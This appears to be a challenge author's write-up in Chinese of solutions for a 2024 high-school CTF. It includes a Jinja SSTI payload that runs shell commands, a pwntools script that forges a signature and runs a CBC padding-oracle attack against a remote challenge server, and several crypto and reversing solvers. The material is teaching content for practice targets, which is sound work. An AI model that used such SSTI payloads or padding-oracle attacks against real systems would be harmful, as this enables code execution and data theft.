owned this note
owned this note
Published
Linked with GitHub
# THJCC CTF 2024 Write Ups for my challenges
我在2024台灣高中生聯合資安競賽中出的題目解答
大多都是新手導向的題目,希望大家覺得好玩 > <
## Web
### Blog
從登入頁面看到奇怪的留言 iloveshark
點入login後以 admin/iloveshark登入
取得flag
### Empty
Flag (1/2)
檢查cookie發現第一段flag
Flag (2/2)
view source後發現隱藏路徑:`/Wh4leE4tSh4rk.html`
連進去
### Simplify
以提供的 test/test1234 登入後觀察cookie
將它改成admin
成功繞過!!!
從原始碼找到提示:Render SSTI
從網路上挖payload RCE (O)
```
{{config.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag').read()")}}
```
## Crypto
### Baby RSA
小e攻擊,直接`gmpy2.iroot(c, 3)`就好ㄌ
### iRSA
原始碼裡面有提供基本的複數運算,可以不用先會沒關係~
利用$(p+2qi)*(q+2pi)=-3pq+(2p^2+2q^2)i$可以解出p, q,最後依次做基本的RSA運算就好。
其中有一個$N$可以查factor db,~~我特別丟上去的~~
## REV
### Baby C
babyc.c
```c
#include"stdio.h"
#include"stdlib.h"
#include"string.h"
int main(){
char c[50];
int a[50]={44, 48, 50, 59, 59, 3, 16, 12, 12, 8, 11, 66, 87, 87, 15, 15, 15, 86, 1, 23, 13, 12, 13, 26, 29, 86, 27, 23, 21, 87, 15, 25, 12, 27, 16, 71, 14, 69, 75, 32, 59, 46, 53, 75, 63, 75, 8, 22, 11, 5};
scanf("%s", c);
for(int i=0;i<50;i++){
if (((int)c[i]^120)!=a[i]){
printf("Password Incorrect!!!\n");
return 0;
}
}
printf("Password Correct!!!\n");
return 0;
}
```
xor都給ㄌ,直接炸回去
Solve Script
```py
a=[44, 48, 50, 59, 59, 3, 16, 12, 12, 8, 11, 66, 87, 87, 15, 15, 15, 86, 1, 23, 13, 12, 13, 26, 29, 86, 27, 23, 21, 87, 15, 25, 12, 27, 16, 71, 14, 69, 75, 32, 59, 46, 53, 75, 63, 75, 8, 22, 11, 5]
flag=''
for i in a:
flag+=chr(i^120)
print(flag)
```
## PWN
### NPSC
~~最最最有趣的競程題~~:
解法複雜度:$O(N)$
先用一個ans=0的初始變數維護最大值,從第一個數字開始掃過去,如果手上的數字比下一個大就繼續把他吃掉,不然就跟ans比誰大,然後歸零從下一個數字開始吃。
solve script:
```py
from pwn import *
r=remote('23.146.248.36', 30003)
#r=remote('0.0.0.0', 29999)
s=r.recvlines(3)
print(s)
def judge(a):
cnt=0
ans=0
for i in range(len(a)):
cnt+=a[i]
if i+1<len(a) and cnt<a[i+1]:
ans=max(cnt, ans)
cnt=0
ans=max(ans, cnt)
return ans
for i in range(3):
s=r.recvline()
print(s)
for j in range(10):
s=r.recvline()
print(s)
exec('a='+str(s)[2:-3])
# print(a)
r.sendline(str(judge(a)).encode())
s=r.recvline()
print(s)
r.interactive()
```
## INSANE
### Baby AES
我在這次比賽出最用心的一個題目,高中正式組有一個人解出來我很開心
題目腳本:
BabyAES.py
```py
from Crypto.Cipher import AES
import os
import hmac
flag=b'THJCC{u_just_break_my_MBC_C1ph3r_mode,_w3ll_don3!!!}'
key=os.urandom(16)
IV=os.urandom(16)
ecb = AES.new(key, AES.MODE_ECB)
cbc = AES.new(key, AES.MODE_CBC, IV)
passphrase=b'eating_whale...'
def pad(data):
p = (16 - len(data) % 16) % 16
return data + bytes([p]) * p
def chk_pad(data):
if len(data)==16:
print("Padding Correct")
elif not all([x == data[-1] for x in data[-data[-1]:]]):
print("Padding Error")
else:
print("Padding Correct")
def sign(x):
x=pad(x)
return hmac.new(key, x, 'sha256').hexdigest()
def xor(a, b):
return bytes([x ^ y for x, y in zip(a, b)])
def MBC(x):
x=pad(x)
iv=IV
final=b''
for i in range(0, len(x), 16):
cur=ecb.encrypt(x[i:i+16])
final+=xor(iv, cur)
iv=x[i:i+16]
return final
print("Welcome to my MBC server")
print("It has more security than ECB I think...")
print("Login first, your message should all be hex encoded!")
isadmin=False
while isadmin==False:
print("We have two functions:")
print("1.Verify your identity:")
print("2.Sign a message")
option=int(input("Option(1/2):"))
if option!=1 and option !=2:
print("Error, your choise should be 1 or 2")
elif option==1:
x=input("Your signed key(hex encoded):")
if sign(passphrase)==x:
print("Verified!!!")
isadmin=True
else:
print("Failed")
else:
x=input("Sign a message(hex encoded):")
if bytes.fromhex(x)==passphrase:
print("Bad Hacker :(")
else:
print(sign(bytes.fromhex(x)))
print("You have two options")
print("This is the encrypted flag(CBC MODE): ") # I know that CBC mode is mush more safer than my MBC mode.
print(cbc.encrypt(pad(flag)).hex())
cbc = AES.new(key, AES.MODE_CBC, IV)
while True:
print("Option 1: MBC MODE Encrypter")
print("Option 2: CBC MODE Pad Checker")
option=int(input("Your option(1/2):"))
if option == 1:
x=input("Encrypt a message(hex encoded):")
print(MBC(bytes.fromhex(x)).hex())
elif option == 2:
x=input("Check a padding(hex encoded):")
chk_pad(cbc.decrypt(pad(bytes.fromhex(x))))
else:
print("Invalid method...")
```
觀察一下登入,會發現pad在長度為16的時候不會做任何事,而拿去hash的東西會是`b'eating_whale...\x01'`但我只有過濾`b'eating_whale...'`不能input,所以改成`b'eating_whale...\x01'`一樣能拿到當次的hash值
再來,我自己定義的MBC Cipher MODE有被bit flipping的弱點,進而可以取得IV:
```py
r.sendline(b'0'*64)
leak=bytes.fromhex(r.recvuntil(b'\n')[:-1].decode())
IV=xor(leak[0:16], leak[16:32])
```
全部塞`b'\x00'`然後加密結果前16 bytes跟後16bytes互相xor就是IV,不難理解,自己可以想想看。
最後一步就是利用取得的IV 搭配 CBC Padding Oracle攻擊。
Solve Script:
```py
from pwn import *
from tqdm import *
r=remote('23.146.248.36', 20003)
def oracle(mess):
s=r.recvlines(2)
s=r.recvuntil(b':')
r.sendline(b'2')
s=r.recvuntil(b':')
r.sendline(mess.hex().encode())
return b'Correct' in r.recvline()
s=r.recvlines(6)
print(s)
s=r.recvuntil(b':')
r.sendline(b'2')
s=r.recvuntil(b':')
r.sendline(b'656174696e675f7768616c652e2e2e01')
sign=r.recvline()[:-1]
s=r.recvlines(3)
s=r.recvuntil(b':')
r.sendline(b'1')
s=r.recvuntil(b':')
r.sendline(sign)
s=r.recvlines(3)
enc_flag=bytes.fromhex(r.recvline()[:-1].decode())
s=r.recvlines(2)
s=r.recvuntil(b':')
r.sendline(b'1')
s=r.recvuntil(b':')
r.sendline(b'0'*64)
leak=bytes.fromhex(r.recvuntil(b'\n')[:-1].decode())
IV=xor(leak[0:16], leak[16:32])
flag=IV+enc_flag
ans=b''
cur=b''
#r.interactive()
for i in trange(0, len(flag)-16, 16):
iv, mess=flag[i:i+16], flag[i+16:i+32]
for j in trange(16):
now=15-j
for k in range(256):
if oracle(iv[:now]+bytes([k])+xor(cur, iv[now+1:], chr(16-now).encode()*(15-now))+mess):
if now==15:
if k!=iv[15]:
cur=xor(k, iv[15], 1)+cur
break
else:
cur=xor(k, iv[now], (16-now))+cur
break
ans+=cur
print(ans)
cur=b''
```
### PELL
純純的數學題(吸)
pell.py
```py
from Crypto.Util.number import *
from Crypto.Cipher import AES
from collections import namedtuple
import os
# define some stuffs about point
Point=namedtuple("Point", "x y")
def Point_Addition(P, Q):
X=(P.x*Q.x+d*P.y*Q.y)%p
Y=(Q.x*P.y+P.x*Q.y)%p
return Point(X, Y)
def Point_Power(P, x):
Q=Point(1, 0)
while(x>0):
if x%2==1:
Q=Point_Addition(Q, P)
x>>=1
P=Point_Addition(P, P)
return Q
# encryption
key=os.urandom(16)
m=bytes_to_long(key)
cipher = AES.new(key, AES.MODE_ECB)
flag=b'THJCC{FAKE_FLAG}'
p=22954440473064692367638020521915192869513867655951252438024058919141
d=1008016
G=Point(1997945712322124204937815965902875623145811005630602636960422269513, 252985428778294107560116770944951015145970075431259613311231816)
C=Point_Power(G, m)
print(f"{C=}\n{p=}\n{d=}")
secret=bytes_to_long(cipher.encrypt(flag))
print(f"{secret=}")
```
可以發現對於點$P(x, y)$,存在對應$P(x, y) \rightarrow x+y*\sqrt d$把點變成整數且仍然滿足題目定義的點運算`Point_Addition`性質(自己拿筆算,驗證看看!!!)。
做完這步驟就是標準的整數DLP問題,利用Pohlig-Hellman attack就可以實作(網路上有script)
Solve script:
```py
from sympy.polys.galoistools import gf_crt
from sympy.polys.domains import ZZ
import gmpy2
import random
# sage version
'''
def solve_discrete_log(p, g, A):
F = GF(p)
g, A = F(g), F(A)
a = discrete_log(A,g)
return a
'''
def Pohlig_Hellman(g, h, p):
p_1 = p - 1
d, factors = 2, []
while p_1!=1:
while (p_1 % d) == 0:
factors.append(d)
p_1 //= d
d += 1
factors = [[i, factors.count(i)] for i in set(factors)]
x = []
for factor in factors:
print("[x]", factor)
c_i_list = []
for i in range(factor[1]):
if i != 0:
beta = (beta * pow(g, -(c_i_list[-1] * (factor[0] ** (i - 1))), p)) % p
else:
beta = h
e1 = pow(beta, (p-1) // (factor[0] ** (i + 1)), p)
e2 = pow(g, (p-1) // factor[0], p)
for c_i in (range(factor[0])):
if pow(e2, c_i, p) == e1:
c_i_list.append(c_i)
break
x.append(c_i_list)
system = []
for i, factor in enumerate(factors):
res = 0
for j, x_j in enumerate(x[i]):
res += x_j * (factor[0] ** j)
res = res % (factor[0] ** factor[1])
system.append(res)
factors = [factors[i][0] ** factors[i][1] for i in range(len(factors))]
result = gf_crt(system, factors, ZZ)
return result
xg=2251943082815531488928173203931606442352364961363587288724899012777
xh=3620329099657742062187693451873462737625932034695683084237035127743
xp=22954440473064692367638020521915192869513867655951252438024058919141
print(Pohlig_Hellman(xg, xh, xp))
```
Sign in with Wallet
